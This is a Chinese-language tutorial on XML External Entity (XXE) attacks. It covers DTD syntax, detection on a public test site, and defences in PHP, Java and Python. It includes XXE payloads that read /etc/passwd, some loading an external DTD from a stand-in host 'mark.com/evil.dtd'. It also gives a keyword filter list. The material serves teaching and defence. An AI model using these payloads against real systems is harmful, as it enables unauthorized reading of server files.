XXE攻击

1.背景

现在很多应用都存在XXE(XML External Entity attack)漏洞，就是xml外部实体攻击，比如facebook，很多XML的解析器默认是含有XXE漏洞的。

2.xml的定义

XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。两个采用不同技术的系统可以通过XML进行通信和交换数据。

例如：

<?xml version='1.0'?>
<student>
<name>lihua</name>
<stuNumber>123456789</stuNumber>
<address>广东</address>
</student>

• 内部声明DTD

  <!DOCTYPE 根元素 [元素声明]>

• 引用外部DTD

1. <!DOCTYPE 根元素 SYSTEM "文件名">

2. <!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量，可以内部声明或外部引用。

• 内部声明实体

  <!ENTITY 实体名称 "实体的值">

• 引用外部实体

  1.<!ENTITY 实体名称 SYSTEM "URI">

  2.<!ENTITY 实体名称 PUBLIC "public_ID" "URI">

3.XML外部实体注入(XML External Entity)

当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

引入外部实体的方式

方式一：

<?xml version='1.0'?>
<!DOCTYPE a [
    <!ENTITY b SYSTEM "file:///etc/passwd">
]>
​

方式二：

<?xml version='1.0'?>
<!DOCTYPE a [
    <!ENTITY % d SYSTEM "http://mark.com/evil.dtd">
    %d;
]>
DTD文件内容
    <!ENTITY b SYSTEM "file:///etc/passwd">

方式三：

<?xml version='1.0' encoding="utf-8"?>
<!DOCTYPE a [
    <!ENTITY a SYSTEM "http://mark.com/evil.dtd">
]>
dtd文档内容
    <!ENTITY b SYSTEM "file:///etc/passwd">

4.什么是xml实体攻击

有了XML实体，关键字’SYSTEM’会令XML解析器从URI中读取内容，并允许它在XML文档中被替换。因此，攻击者可以通过实体将他自定义的值发送给应用程序，然后让应用程序去呈现。简单来说，攻击者强制XML解析器去访问攻击者指定的资源内容（可能是系统上本地文件亦或是远程系统上的文件）。

5.怎么甄别一个XML实体攻击漏洞？

通过抓包，修改HTTP的请求方法，修改Content-Type头部字段等等方法，然后看看应用程序的响应，看看程序是否解析了发送的内容，如果解析了，那么则可能有XXE攻击漏洞。

6.如何确认XXE漏洞？

通过访问 http://testhtml5.vulnweb.com/ 站点，点击 ‘Login’下面的 ‘Forgot Password’

请求包：

响应：

观察以上请求和响应，应用程序正在解析XML内容，接受特定的输入，然后将其呈现给用户。

自定义xml外部实体测试，请求和响应，定义了一个名为myentity、值为’testing’的实体。响应报文清晰地展示了解析器已经解析了我们发送的XML实体，然后并将实体内容呈现出来了，可确认存在XXE漏洞

7.防御XXE攻击

方法一：使用开发语言提供的禁用外部实体的方法

PHP：

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

Python：

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方法二：过滤用户提交的XML数据

关键词：<!DOCTYPE和<!ENTITY，或者，SYSTEM和PUBLIC。